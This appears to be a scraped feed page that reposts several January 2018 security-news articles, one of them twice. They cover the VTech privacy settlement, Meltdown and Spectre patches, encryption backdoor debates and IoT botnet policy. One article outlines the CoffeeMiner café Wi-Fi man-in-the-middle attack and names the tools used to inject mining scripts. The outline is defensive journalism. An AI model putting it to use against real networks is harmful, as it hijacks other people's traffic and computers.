STE WILLIAMS

In 2015, smart toymaker VTech tripped. And it fumbled a whole lot of frighteningly specific data about children when it did.

Well, allegedly, at any rate. An intruder claimed to have broken into servers and ripped off data s/he said was so sensitive, it made them queasy.

With good reason: the intruder claimed to have accessed photos of kids and parents; chatlogs; and audio files. The FTC said they got first names, genders and birthdays of about 638,000 children. The intruder said they got email addresses; encrypted passwords; secret questions and answers for password retrieval; IP addresses; mailing addresses; and download histories. The personal data pertained to 4,833,678 parents, the intruder said.

On Monday, VTech didn’t admit to wrongdoing, but it did settle Federal Trade Commission (FTC) charges that the company violated children’s privacy law – that would be the Children’s Online Privacy Protection Act (COPPA) – and the FTC Act.

The FTC announced on Monday that VTech had agreed to settle for a civil fine of $650,000.

In a complaint filed by the US Department of Justice on behalf of the FTC, the commission alleged that VTech’s Kid Connect app collected the personal information that was allegedly breached. Kid Connect is a service that allows parents and kids to chat via a mobile phone app and a VTech tablet.

The FTC said in the complaint that VTech “failed to provide direct notice to parents or obtain verifiable consent from parents concerning its information collection practices, as required under [COPPA].”

The FTC also alleged that VTech “failed to use reasonable and appropriate data security measures to protect personal information it collected”. The Commission said that this is its first completed children’s privacy case involving internet-connected toys.

The Hong Kong toymaker not only (allegedly) lost the data: it also dinged customer confidence by slipping in a tweaked terms and conditions policy that passed the buck for for any future breach to its customers, like so:

You acknowledge and agree that any information you send or receive during your use of the site may not be secure and may be intercepted or later acquired by unauthorized parties.

I mean, c’mon, VTech said when it amended the policy in February 2016, a few months after the breach disclosure: security isn’t something you can actually guarantee. CSO Online at the time quoted Grace Pang, head of corporate marketing at VTech Holdings Ltd.:

No company that operates online can provide a 100% guarantee that it won’t be hacked. The Learning Lodge Terms and Conditions[*], like the Terms and Conditions for many online sites and services, simply recognize that fact by limiting the company’s liability for the acts of third parties such as hackers. Such limitations are commonplace on the Web.

(*Learning Lodge allows VTech’s customers to download games, e-books and other educational content to their VTech products, while Kid Connect allows children and parents to exchange voice and text messages, photos, drawings and stickers between its products/services and parents’ smartphones.)

The FTC complaint alleges that VTech didn’t take “reasonable steps to protect the information it collected through Kid Connect, such as implementing adequate safeguards and security measures to protect transmitted and stored information and implementing an intrusion prevention or detection system to alert the company of an unauthorized intrusion of its network.”

It also alleged that VTech violated the FTC Act by stating in its privacy policy that most personal information submitted by users through the Learning Lodge and Planet VTech would be encrypted. It was not, the Commission claims.

Beyond the monetary settlement, VTech is also permanently prohibited from violating COPPA in the future and from misrepresenting its security and privacy practices as part of the proposed settlement. It’s also facing a requirement to roll out a comprehensive data security program that will be subject to biennial, independent audits for 20 years.

Congratulations, FTC, on the first case against children’s privacy violations to be settled. It’s unlikely to be the last, particularly given how popular connected toys are getting and how privacy and data protection aren’t always high in manufacturers’ priority lists.

Acting FTC Chairman Maureen K. Ohlhausen, from Monday’s announcement of the VTech settlement:

As connected toys become increasingly popular, it’s more important than ever that companies let parents know how their kids’ data is collected and used and that they take reasonable steps to secure that data. Unfortunately, VTech fell short in both of these areas.

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/GE4IKxPoSGM/

Facebook has responded to governments’ criticism of cryptography by giving the world an open source encrypted group chat tool.

It’s hardly likely to endear the ad-farm to people like FBI Director Christopher Wray, who yesterday told an international infosec conference it was “ridiculous” that the Feds have seized nearly 8,000 phones they can’t access. UK prime minister Theresa May has also called for backdoors in messaging services and for social networks to stop offering “safe spaces” for extremists.

Facebook’s latest project, which went live on GitHub yesterday, tackles the problem of protecting group chat. ART, Asynchronous Ratcheting Tree, was created by Facebook’s Jon Millican and Oxford University’s Katriel Cohn-Gordon, Cas Cremers, Luke Garratt and Kevin Milner.

As the group explains in a December paper^* [PDF] about ART at the International Association for Cryptologic Research (IACR) pre-press site, existing chat solutions are great between individuals but not so good at protecting group chats.

In group chats, the paper said, “WhatsApp, Facebook Messenger and the Signal app … use a simpler key-transport mechanism (‘sender keys’) which does not achieve PCS” – that’s post-compromise security – if Alice realises a conversation is compromised, the system has a means re-establish secure communications).

The shortcomings of those apps, the group wrote, means if someone hacks one member of a group, they can “indefinitely and passively read future communications in that group … In practice this means that in these apps, if a third party is added to a two-party communication, the security of the communication is decreased without informing the users.”

To protect group chats, ART “derives a group key for a set of agents” that’s secure even if some members aren’t online, and “even after total compromise, an agent can participate in a secure group key exchange.”

The ART scheme sets up conversations using what the paper calls “asymmetric prekeys” (a model created by Moxie Marlinspike for TextSecure) and a one-time asymmetric setup key. The Diffie-Hellman setup key is generated by the creator of a group chat, and is only used during session creation, allowing the group leader to create secret “leaf keys” for other group members while they’re offline.

To add PCS to this, Alice needs a way to replace a leaf key if hers is compromised, and other group members need to be able to get the new key.

To get a new leaf key, Alice “computes the new public keys at all nodes along the path from her leaf to the tree root, and broadcasts to the group her public leaf key together with these public keys.”

The protocol then lets other group members compute the updated group key, “again without requiring any two group members to be online at the same time”.

The implementation Facebook published is offered under a Creative Commons license. ®

^*Bootnote: There’s no significance whatever to the IACR paper’s filename being “666.pdf”, we’re sure you’ll agree.

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/facebook_opensources_encrypted_group_chat_tools/

The Russian Defense Ministry has reported that its forces in Syria have been attacked by a swarm of GPS-guided drones carrying improvised explosives.

The attack took place on the night of December 5, with 13 drones were picked up on radar. Ten aimed themselves at Russia’s Hmeymim air base and three more headed for a logistics and supply base near the Syrian city of Tartus.

According to the Russians six of the drones were pwned by electronic warfare specialist and diverted from the attack. Of that six, three were successfully collected for examination but the remainder detonated after landing. The Russians report the other seven were blown up midair by a Pantsir-S anti-aircraft missile system.

Shock! Hackers for medieval caliphate are terrible coders

READ MORE

“Currently, the Russian military experts are analyzing the construction, technical filling and improvised explosives of the captured UAVs,” said the statement.

“Having decoded the data recorded on the UAVs, the specialists found out the launch site. It was the first time when terrorists applied a massed drone aircraft attack launched at a range of more than 50 km using modern GPS guidance system.”

While this sounds scary the pictures posted of the drones by the Russians raise some serious questions about the efficacy of the technology used. While the home-made bombs look authentic the drones themselves look cobbled together and low-tech.

Deadly payload that wasn’t delivered

The drones appear to be powered by a single propeller that will be familiar to anyone who has flown model aircraft. They also bore a control package and presumably a fuel tank built into the body of the drone, but appear to have few metal parts and lack even landing wheels. Russia has not shown details of the GPS control system, but insist they were highly advanced machines.

“Attacks on the Russian objects in Syria could be received from one of countries with high-technological capabilities of satellite navigation and remote dropping control of professionally assembled improvised explosive devices in assigned coordinates,” Russia’s military said.

Drones have become increasingly common weapons for forces of all sizes. Even the medieval terror bastards in Iraq have adopted the use of drones, using commercially bought quadcopters to drop mortar shells and hand grenades on opposition forces.

“The Russian specialists are determining supply channels, through which terrorists had received the technologies and devices, as well as examining type and origin of explosive compounds used in the IEDs,” the ministry said.

“The fact of usage of strike aircraft-type drones by terrorists is the evidence that militants have received technologies to carry out terrorist attacks using such UAVs in any country.” ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/syrian_drone_swarm/

Winners of a security quiz staged by Taiwan’s Criminal Investigation Bureau may be wondering why they tried so hard to do well after some of the USB drives handed out as prizes turned out to be wretched hives of malware and villainy.

According to the Taipei Times, the Bureau hosted an infosec event in December 2017, and gave 250 drives to people who won a cybersecurity quiz.

It’s since emerged that 54 of the 8GB drives were infected by a computer used by an employee of supplier Shawo Hwa Industries Co “to transfer an operating system to the drives and test their storage capacity”.

While the dongles were manufactured in China, the Taipei Times said there’s no suggestion that espionage was a motive.

The good news is that the infection was an old virus Chinese-language site Liberty Times names as “XtbSeDuA.exe” that tries to steal personal data from 32-bit machines.

The CIB says stolen data was forwarded to a relay IP address in Poland which in 2015 was associated with 2015 Europol raids on an electronic funds fraud ring. The police added that the server receiving the data from the latest infections has been shut down.

The prizes were handed out from December 11 to December 12, when complaints from the public started arriving, but 34 of the drives are still in circulation somewhere. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/taiwanese_police_malware/

Facebook has responded to governments’ criticism of cryptography by giving the world an open source encrypted group chat tool.

It’s hardly likely to endear the ad-farm to people like FBI Director Christopher Wray, who yesterday told an international infosec conference it was “ridiculous” that the Feds have seized nearly 8,000 phones they can’t access. UK prime minister Theresa May has also called for backdoors in messaging services and for social networks to stop offering “safe spaces” for extremists.

Facebook’s latest project, which went live on GitHub yesterday, tackles the problem of protecting group chat. ART, Asynchronous Ratcheting Tree, was created by Facebook’s Jon Millican and Oxford University’s Katriel Cohn-Gordon, Cas Cremers, Luke Garratt and Kevin Milner.

As the group explains in a December paper^* [PDF] about ART at the International Association for Cryptologic Research (IACR) pre-press site, existing chat solutions are great between individuals but not so good at protecting group chats.

In group chats, the paper said, “WhatsApp, Facebook Messenger and the Signal app … use a simpler key-transport mechanism (‘sender keys’) which does not achieve PCS” – that’s post-compromise security – if Alice realises a conversation is compromised, the system has a means re-establish secure communications).

The shortcomings of those apps, the group wrote, means if someone hacks one member of a group, they can “indefinitely and passively read future communications in that group … In practice this means that in these apps, if a third party is added to a two-party communication, the security of the communication is decreased without informing the users.”

To protect group chats, ART “derives a group key for a set of agents” that’s secure even if some members aren’t online, and “even after total compromise, an agent can participate in a secure group key exchange.”

The ART scheme sets up conversations using what the paper calls “asymmetric prekeys” (a model created by Moxie Marlinspike for TextSecure) and a one-time asymmetric setup key. The Diffie-Hellman setup key is generated by the creator of a group chat, and is only used during session creation, allowing the group leader to create secret “leaf keys” for other group members while they’re offline.

To add PCS to this, Alice needs a way to replace a leaf key if hers is compromised, and other group members need to be able to get the new key.

To get a new leaf key, Alice “computes the new public keys at all nodes along the path from her leaf to the tree root, and broadcasts to the group her public leaf key together with these public keys.”

The protocol then lets other group members compute the updated group key, “again without requiring any two group members to be online at the same time”.

The implementation Facebook published is offered under a Creative Commons license. ®

^*Bootnote: There’s no significance whatever to the IACR paper’s filename being “666.pdf”, we’re sure you’ll agree.

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/facebook_opensources_encrypted_group_chat_tools/

Analysis After spending last week insisting that the performance impact of fixing the Meltdown and Spectre CPU vulnerabilities “should not be significant,” Intel on Tuesday tried to maintain that stance even as it acknowledged SYSmark tests assessing post-patch slowdowns ranging from two per cent to 14 per cent.

Reiterating that typical consumer and business usage – reading email, opening documents, and accessing digital photos – should not exhibit any performance hit from remediation, Intel said, “8th Generation Core platforms with solid state storage will see a performance impact of six per cent or less.”

That’s a dubious carve-out because so much consumer and business computing relies on cloud-based servers, which, as The Register reported on Monday, have exhibited slower response times and increased CPU utilization arising from the fixes rolled out by affected vendors.

Intel’s effort to minimize the consequences of the two flaws looks a lot like a preemptive defense against litigation.

It’s too late for that. At least eight lawsuits against Intel have been filed since The Register first reported the flaws on January 2.

Last week, Intel lied. Intel lied in public. Intel lied to journalists. Its share price was falling. And it lied about performance hits.

— The Register (@TheRegister) January 9, 2018

Chipzilla may also be concerned about scrutiny from the Securities and Exchange Commission: CEO Brian Krzanich sold of most of his company stock in November, several months after Intel was made aware of the Meltdown and Spectre vulnerabilities. Even if the sale was made as part of a pre-established plan, the timing of the sale looks terrible.

Too blunt, time to punt

Also hard on the eye is the decision by Carnegie Mellon University’s (CMU) Software Engineering Institute to water down CERT/CC’s initial Meltdown/Spectre vulnerability notice, as it is easily interpreted as an attempt to dampen concerns.

CMU’s initial advice, issued on January 3, advised replacing CPUs because the “underlying vulnerability is primarily caused by CPU architecture design choices.”

A revision that appeared the following day removed that recommendation even though others have said as much. For instance, Daniel Genkin, a postdoctoral researcher who helped uncover the flaws, told The Register that a lasting fix requires hardware redesign.

In a phone interview, The Register asked Art Manion, vulnerability analysis technical manager at the CERT division of CMU’s Software Engineering Institute and the author of Vulnerability Note VU#584653, whether Intel had pressured CERT to revise its language.

Manion acknowledged that vendors including Intel had been in contact as part of the disclosure process, but he insisted the initial wording and the revision came from the CERT Coordination Center rather than elsewhere.

In this particular instance, he said, CERT was not involved in the pre-public coordination of the disclosure. And once the story broke, “we were scrambling,” he said.

Initially, he said, it looked like a problem tied to hardware. Upon further analysis and communication with vendors, he said, “We decided the language was too blunt.”

Hardware plays a role, he said, “but one of the tenets of our advice is to provide actionable information.”

In other words, telling the world to toss the bulk of the processors produced in the past decade just wasn’t a realistic response.

The Register asked Intel whether it had requested more moderate language.

In an email, an Intel spokesperson said, “I can confirm that we were in touch with CERT. I don’t have anything to add to that.”

Chipzilla’s terrifying response: a new branch on the org chart

While Intel would have the outside world overlook the whole affair, the chipmaker has reportedly reorganized internally to focus more on security. On Monday, The Oregonian reported that Krzanich has shuffled top executives to create a new internal security group called Intel Product Assurance and Security, headed by human resources head Leslie Culbertson.

In a related, belated recognition of the value of security, Intel introduced its first bug bounty program for its own products in March last year.

In any event, Intel’s downplaying of meaningful consequences from Meltdown and Spectre appears to have become unsustainable after Red Hat last week said the impact of patches ranged from 1 to 20 per cent in its benchmarks and Microsoft on Tuesday said something similar.

Microsoft did not release specific benchmark numbers and declined to provide them to The Register, through it said it would release results once the tests are complete.

However, in a blog post Tuesday, Terry Myerson, president of Microsoft’s Windows and device group, did confirm varied degrees of delay, depending on the hardware and software involved.

On Windows 10 PCs with Skylake, Kabylake or newer CPUs, the effect of vulnerability mitigation is minimal. But with Windows 10 running on older hardware, Myerson said, “we expect that some users will notice a decrease in system performance.”

For users of Windows 8 and Windows 7, Myerson said, “we expect most users to notice a decrease in system performance.”

For Windows Server, Myerson suggested, it could be worse still, with IO-intensive applications showing “a more significant performance impact when you enable the mitigations to isolate untrusted code within a Windows Server instance.”

In fact, the impact is significant enough in Windows Server customers that Myerson suggests dropping shields for speed. He advises those running Windows Server “to evaluate the risk of untrusted code for each Windows Server instance, and balance the security versus performance tradeoff for your environment.”

There you have it: security or performance. Choose one. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/intel_allows_that_meltdown_and_spectre_may_slow_servers_down/

IBM’s started to release its own patches for the Meltdown mess and the Spectre SNAFU, which it’s half-confirmed impact its hardware and operating systems, but won’t have a complete fix until mid-February.

We say half-confirmed because Big Blue has only said it has problems with the processor issues Google mentioned last week, rather than naming either bug.

The company strongly hinted that POWER systems were in trouble last Thursday, January 4th. On Tuesday the 9th the company confirmed the problem, admitting that its kit “could allow a party that has access to the system to access unauthorized data.”

IBM melts down fixing Meltdown as processes and patches stutter

READ MORE

The fix has two steps: IBM wrote that it “involves installing patches to both system firmware and operating systems. The firmware patch provides partial remediation to these vulnerabilities and is a pre-requisite for the OS patch to be effective.”

As of Tuesday, the POWER7+ and POWER8 patches are ready. IBM’s promised POWER9 patches on January 15th. So that’s the pre-requisites sorted. But patches for AIX and the i operating system “will be available February 12.” That’s more than a month away at the time of writing.

While it prepares its OS patches, IBM’s advised clients that “If this vulnerability poses a risk to your environment, then the first line of defense is the firewalls and security tools that most organizations already have in place.” Big Blue’s also said “Clients should review these patches in the context of their datacenter environment and standard evaluation practices to determine if they should be applied.”

The latter is a motherhood statement but perhaps also tacit recognition that AIX and i often run in environments where applications are so sensitive to downtime that change windows are few and far between.

That means the lag between CPU patches and OS patches might not be entirely unwelcome in some IBM shops as they’ve got a month to plan the firmware upgrade on test and dev rigs and can plan one nice big change window not long after the OS patches drop in mid-February. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/ibm_meltdown_spectre_patches_not_arriving_until_mid_february/

Remember how an Argentinian Starbucks store recently turned out to be doing JavaScript cryptomining on the side?

That’s where someone else uses your computer, via your web browser, to perform a series of calculations that help to generate some sort of cryptocurrency, and keeps the proceeds for themselves.

In that case, it seems to have been a unilateral decision by the Wi-Fi provider to include coin mining JavaScript code in the Wi-Fi registration page.

We’re guessing that the provider figured it would be OK to “borrow” approximately 10 seconds of CPU time whenever someone connected to the Wi-Fi, presumably as a way of earning a few extra pennies in return for providing free internet access:

(Just for the record, the tweeter was wrong above, inasumch as the code was mining Monero, not Bitcoin – but the sentiment was spot-on.)

Starbucks wasn’t impressed, and “took swift action to ensure [the] internet provider resolved the issue”.

We’re guessing here, but we’re prepared to assume that this “swift action” involved a very short phone call in a rather loud voice.

But it’s not only the Wi-Fi operator or the coffee shop owner that you need to worry about.

If you join a public Wi-Fi network, and you don’t use a VPN, or stick to HTTPS websites, or both, then…

…anyone else in the coffee shop (or bus, or train, or hotel lobby, or wherever it is) at the same time can sniff out what you’re doing, and pwrhaps also trick you into seeing and doing something you didn’t expect.

Thanks to a “for academic purposes only” project called CoffeeMiner, rogues in your local cafe can now trick you into cryptomining, along with any other web-based cyberdodginess they might have in mind:

The project is the brainchild of a software developer from Barcelona who goes by the name Arnau Code, and if you ignore its potential for misuse (please read the disclaimer!), we think it’s a well-prepared tutorial about Man-in-the-Middle MitM) attacks.

If you’ve ever wondered why HTTPS (the padlock in your browser) really matters, and why every site really ought to use it instead of serving up content using plain old HTTP, you should look at Arnau’s article. Don’t just take it from us that HTTPS is about more than secrecy. The CoffeeMiner project is a good reminder that HTTPS is about authenticity and tamper-resistance, too – getting the right stuff from the right place.

A MitM attack is where someone else on the network gets to see your network requests before they set off to their final destination, and can intercept the replies before they get back to you.

Instead of talking directly to the site you’re expecting, you are effectively talking through a middleman, who can alter what you ask in the first place, and change what you see in reply.

Altering the answers is what CoffeeMiner does: through a variety of tricks, it intercepts your web traffic before it reaches the Wi-Fi access point in the coffee shop; it covertly fetches the web page you requested on your behalf; and it sneaks a line of coin-mining JavaScript in the reply.

In other words, every website you visit could, in theory, end up temporarily mining cryptocurrency for someone else.

Simply explained, Coffee Miner:

• Tricks your network card into thinking that the CoffeeMiner is the access point. The open source product dnsiff is used for this part.
• Passes on all your network traffic directly except for web requests.
• Pushes your web traffic into a man-in-the-middle proxy. The open source toolkit mitmproxy is used here.
• Inserts one line of coin-mining HTML into your web replies.

The CoffeeMiner code doesn’t actually inject coin mining code directly; instead it injects a line like this:

The IP number and port (in this example, 192.0.2.42:8000) is a web server running on the CoffeeMiner computer itself – in fact, it’s part of the CoffeeMiner toolkit – that serves up the actual cryptomining code of your choice. (Arnaud Code chose a widepspread miner known as CoinHive.)

What to do?

This isn’t really a lesson about cryptomining, though that certainly adds to the intrigue.

The problem here is that on an untrusted network (and that means almost every network you’ll ever use these days, because it’s hard to vouch for every user and every device attached at any moment), a rogue user can very easily mess with any web traffic that isn’t encrypted using HTTPS.

Without HTTPS, there is no confidentiality, so anyone can see what you are doing and saying; there is no identification, so you have no idea who’s replying; and there is no integrity, because you can’t tell when someone has tampered with what you’ve just downloaded, for example by stuffing a coin mining script into every web page.

As we mentioned at the start:

• Stick to sites that use HTTPS. A web-based MitM attack will almost always trigger a warning that you are connecting via an imposter server.
• Urge sites that don’t yet use HTTPS to start doing so. It’s a little bit more work, but worth the effort.
• Use a VPN if your work provides one. This encrypts all your network traffic back to head office, not just your web browsing.

By the way, if you want to run a VPN at home, and you have a spare computer handy, why not try the Sophos XG Firewall Home Edition? You get a free licence for everything the product can do, including anti-virus, web filtering, email security, IPS, plus a fully-fledged VPN.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/uFsL29U7Xvk/

FBI Director Christopher Wray has picked up where he left off last year with a new call for backdoors in encryption exclusively for law enforcement.

Speaking at the International Conference on Cyber Security in New York today, Wray complained that in the past year the Feds have seized 7,775 devices that they can’t unlock and decrypt. He said the situation was ridiculous, and called on the technology industry to find a solution. Essentially, let Uncle Sam’s g-men decrypt data stored on devices on demand, while still somehow keeping stuff secure against hackers and other crooks, he argued.

“Being unable to access those devices is a major public safety issue and impacts our investigations across the board,” he said. “This problem will require a thoughtful and sensible approach. We have people devoted to working with stakeholders to find a way forward. We need the private sector’s help.”

He claimed that the problem was impeding cases involving human trafficking, counterterrorism, organized crime, and child exploitation.

FBI boss: ‘Memories are not absolutely private in America’

READ MORE

Wray said the FBI was undergoing a digital revolution to deal with the increased investigations into electronic devices. He likened it to the kind of reorganization the agency went through after the September 11 terrorist attack.

Now, he claimed, there are cyber task forces in every FBI field office, and there are national cyber action teams who can be deployed at a moment’s notice. Too bad they aren’t that good at their jobs, and occasionally miss their chance to unlock devices without resorting to federally mandated backdoors.

“The FBI has to recognize that that there’s a technology and digital component to almost every case we have,” he said. “Transnational crime groups, sexual predators, fraudsters and terrorists are transforming the way they do business as technology evolves.”

What Wray wants is a secure form of encryption that contains a flaw that only law enforcement can find and exploit. Trouble is, scumbags will no doubt find and leverage it, too. The FBI boss’s predecessor James Comey also had an obsession with effectively weakening citizens’ security. Comey constantly complained that criminals were “going dark” using encryption.

The problem for the FBI, and others of a similar mind, is that there isn’t some rainbow unicorn software solution to implementing a cops-only backdoor in secure end-to-end or storage encryption. The finest minds in cryptography – and the NSA – are united on this score. It’s mathematically impossible to introduce an encryption backdoor that only law enforcement can find and use. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/09/fbi_boss_backdooring_encryption/

The US Department of Commerce (DoC) and Department of Homeland Security have put out a draft cybersecurity report that recommends, among other things, that the American government fund a public awareness campaign on IoT security, and make cybersecurity a compulsory part of future engineering degrees.

The 38-page report [PDF] titled “Enhancing the Resilience of the Internet and Communications Ecosystem Against Botnets and Other Automated, Distributed Threats” is the first of many that are heading to the president’s desk following an executive order signed in May, following a number of abortive attempts.

The report is pretty good: it identifies the current issues facing government, industry and consumers when it comes to cybersecurity – focused specifically on botnets, as the title suggests – and is largely written in plain English. It doesn’t gloss over problems, nor does it hype up some threats or diminish others. In short, it is the kind of professionally produced policy paper that the government still, fortunately, produces despite the noise and nonsense above civil servants.

The only issue that is notable by its absence is the inter-agency battle going on within the US government to take the lead on internet security and the internet-of-things (IoT).

As is typical in such documents, however, many of the actual recommendations are a little wishy-washy. Such as the key “goal” to “identify a clear pathway toward an adaptable, sustainable, and secure technology marketplace.” Or “promote innovation.” Or “build coalitions.”

Due to its traditional hands-off approach to industry and the fact that the internet mostly resides in private hands, there is little that the DoC or DHS can do in real, solid terms. But it does identify where the problems lie and the best way to fix them.

Consumers

Perhaps the most useful part of the report is the recognition that you cannot and should not expect consumers to be responsible for the internal security of devices that they buy in a store and then connect to their home wireless.

This is especially true when it comes to the “internet of things” – a market that the report correctly notes is “much like that of desktop computing in the 1990s” i.e. massively insecure.

“IoT devices are often sorely lacking in such security-focused features,” the report stated. “These systems now offer the most attractive target to malicious actors, and are an increasingly large percentage of the devices in the ecosystem.”

It went on: “The reality is that consumers are not directly affected by compromises of their devices; in fact, the consumer may never know that the device is part of a botnet. From the consumer’s perspective, the webcam is still streaming, or the refrigerator is still chilling.

“For this reason, it is impractical to hold the owners responsible if their devices are used in a botnet. This lack of clear consequences of infection creates a challenge in motivating consumers to take steps to improve security, for example, to update even those devices that are updateable.”

Which is hardly news to IT professionals but it is good to see the problem stated clearly and succinctly in a US government report.

The dossier also noted that software and firmware security updates and similar best practices are a pretty effective solution to IoT insecurity but the problem is that too few companies or individuals actually do it. And so, it argued, as many have for years, that security needs to be baked-in to devices, including secure automated updates.

“Ideally, devices marketed toward consumers should be designed with security built in,” the document read. “Consumer products should be designed as securely as possible, should include secure automated update mechanisms, and should have few to no requirements for managing the products.”

Baseline

The US government is not going to impose rules on industry so instead it argues the case for working with businesses to develop “broadly accepted baseline security profiles for IoT devices in home and industrial applications.” And it suggests using the US government’s role as a big procurement organization to “accelerate this process by adopting baseline security profiles for IoT devices in US government environments” – which sounds like a smart approach and has worked to some degree with things like DNSSEC and IPv6.

Perhaps the most public-facing recommendation, however, is for the government to fund a consumer awareness campaign over IoT security. “The federal government should establish a public awareness campaign to support recognition and adoption of the home IoT device security profile and branding,” it argues.

Later on, it also advocates for more federal dollars to be spent on research and development “to support advancement in DDoS prevention and mitigation, as well as foundational technologies to prevent botnet creation.”

Speaking of IPv6, the report is a little concerned about the potential impact of widespread adoption of the new protocol on cybersecurity.

IPv6 will give every device its own IP address and so, potentially, make many millions of new devices susceptible to being attacked and hacked. In this respect, the use of IPv4 and NATs may produce a more secure environment by putting arrange of devices behind a single IP address.

It’s not backing away from IPv6 adoption – in fact it argues for incentives to ensure faster take-up by ISPs – but it does recommend investigating “how wider IPv6 deployment can alter the economics of both attack and defense.”

Natty dread

One plus to IPv6 is that people will be able to more easily discover which specific device has been compromised. But at the same time it references the Mirai botnet as being especially effective because it attacked devices (typically webcams) that had their own IP address. By contrast: “NAT tools act as an incidental firewall, preventing devices in the home from being directly reached by the sort of mass-scanning tools that spread malware and lead to widespread infection.”

It even digs into the issue of a greatly expanded namespace: “In theory, the IPv6 address space is so large that it would not be scannable using existing tools, but experts have observed that patterns would allow new scanning techniques to still discover vulnerable devices.”

So what’s the solution? Studies with a focus on “further innovation at the edge of the network.”

There are lots of other ideas, suggestions and recommendations – most of them containing the word “should” somewhat undercutting a sense of urgency – but one that stands out is ensuring that the next generation of engineers are trained in what will undoubtedly be a critical skill from this point on.

“The academic sector, in collaboration with the National Initiative for Cybersecurity Education, should establish cybersecurity as a fundamental requirement across all engineering disciplines.”

That’s just one of many good ideas contained in this report, which was published late last week. It is open for public comment from now until February 12 – so a little over a month (email: [email protected]). If you have strong feelings about any of this, now would be a good time to let the US government know. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/09/us_govt_cybersecurity_recommendations/